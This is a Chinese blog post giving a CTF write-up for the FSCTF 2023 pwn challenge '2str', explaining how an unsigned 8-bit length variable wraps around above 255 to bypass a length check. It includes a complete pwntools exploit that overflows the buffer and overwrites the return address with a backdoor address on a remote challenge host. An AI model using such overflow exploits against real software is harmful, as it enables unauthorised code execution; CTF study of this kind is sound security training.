首页 > 其他分享 >【pwn】[FSCTF 2023]2str --整数溢出绕过

【pwn】[FSCTF 2023]2str --整数溢出绕过

时间:2023-11-18 19:56:46浏览次数:29  
标签:2str -- v3 io 2023 pwn 绕过 payload 255

检查一下保护状态

接着ida看代码逻辑

看func函数

第一次看真没发现有什么漏洞,题目给了backdoor,虽然strlen可以\x00绕过,但是strcpy函数也限制漏洞的实现。仔细看的话,会发现v3的类型是 unsigned __int8 v3;

说明v3是一个字节来表示的,可表示的范围只有0~255,那这样绕过思路就很清晰了,我们的payload构造长度超过255,不超过265就行,然后就可以绕过if语句的判断

exp:

from pwn import * context(os='linux',arch='i386',log_level='debug') io=remote("node4.anna.nssctf.cn",28587)
payload=b'a'*(0xb9)+b'a'*0x4+p32(0x80492AF) payload=payload.ljust(260,b'a') payload+=b'\x00' io.send(payload)
io.interactive()  

 

标签:2str,--,v3,io,2023,pwn,绕过,payload,255
From: https://www.cnblogs.com/GGbomb/p/17840993.html

相关文章

  • 囚徒_mnist
    #囚徒mnisttry:importurllib.requestexceptImportError:raiseImportError('YoushouldusePython3.x')fromastimportNotimportos.pathimportgzipimportpickleimportosimportnumpyasnpurl_base='http://yann.lecun.com/exdb/mnist/&......
  • 终于知道老师喜欢用for(TYPE i=0;i<N;i++)而非for(TYPE i=N-1;i<=0;i--)的原因了
    上课时看到老师写u8Spi1_Send_Recv_Byte(u8txdata){u8rxdata=0x00;u8i;SCK=0;for(i=0;i<8;i++){//下降沿发数据if(txdata&1<<(7-i)){MOSI=1;}else......
  • 囚徒4.0_12
    #囚徒4.0_12importnumpyasnpdefAND(x1,x2):x=np.array([x1,x2])w=np.array([0.5,0.5])b=-0.7temp=np.sum(x*w)+biftemp>0:return1else:return0defOR(x1,x2):x=np.array([x1,x2])w=np.array([1,1])b=-0.5temp=np.sum(x*w)+biftemp>0:return1e......
  • 囚徒_风云云检测算法改进
    functionmask=code(ref_b2,ref_b3,ref_b4,ref_b5,tmp_7,tmp_9,tmp_13,tmp_15,SC,height,mask_lan)%算法实现%此处提供详细说明sz=size(ref_b2);temp=ref_b4*0;temp(temp~=-999.0)=1;raio=ref_b3./ref_b2;%可信矩阵准备mat_15=T_mat(tmp_15,224,228,"lt");mat_9=T_m......
  • LYNU WIFI Loginer ---- 去xx的六秒等待
    LYNUWIFILoginer是一款方便快捷的小工具,专为洛阳师范学院(LYNU)的WIFI登录而设计。该工具具有以下突出特点:快速登录LYNUWIFILoginer可以帮助用户快速登录校园WIFI,省去了打开浏览器并等待六秒钟的繁琐步骤。只需一键操作,即可轻松连接到WIFI网络。完备的日志监控LYNUWIFI......
  • 20211325 2023-2024-1 《信息安全系统设计与实现(上)》第十周学习笔记
    202113252023-2024-1《信息安全系统设计与实现(上)》第十周学习笔记一、任务要求自学教材第12章,提交学习笔记(10分),评分标准如下1.知识点归纳以及自己最有收获的内容,选择至少2个知识点利用chatgpt等工具进行苏格拉底挑战,并提交过程截图,提示过程参考下面内容(4分)“我在学***X知......
  • 互联网图片抓取
    1.互联网图片抓取 说明:图片、音频、视频在计算机中以二进制方式存储 实现:找到所在图片的URL地址、想图片URL地址发送请求,获取二进制响应内容(bytes)、 正常打开文件,将响应内容以wb方式保存到本地requests模块:html=requests.get(url=url,headers=headers).text 响应对象(......
  • NOIP2023 游记:未来可期
    更好地观看前言人可回天地之心,天地不能夺人之心。大丈夫行事,论是非不论利害,论逆顺不论成败,论万世不论一生。志之所在,气亦随之。气之所在,天地鬼神亦随之。AI定场诗:OI侠客乐无边,代码世界舞飞旋。算法高人传绝技,数据结构展神通。比赛场中争胜负,编程路上展雄风。英雄不问出处......
  • 囚徒4.0_13_梯度
    囚徒4.0_13_梯度这是是关于求取梯度的#coding:utf-8importnumpyasnpimportmatplotlib.pylabaspltfrommpl_toolkits.mplot3dimportAxes3D#非批处理梯度求取(1,2)(x1,x2)def_numerical_gradient_no_batch(f,x):h=1e-4#0.0001grad=np.zeros_like(x)#对x进......
  • 囚徒4.1_12_数值微分近似
    数值微分近似#囚徒4.0_13_数值微分近似importnumpyasnpimportmatplotlib.pylabasplt#求数值微分导数defnumerical_diff(f,x):h=1e-4#0.0001return(f(x+h)-f(x-h))/(2*h)#函数deffunction_1(x):return0.01*x**2+0.1*xdeftangent_line(f,x):d......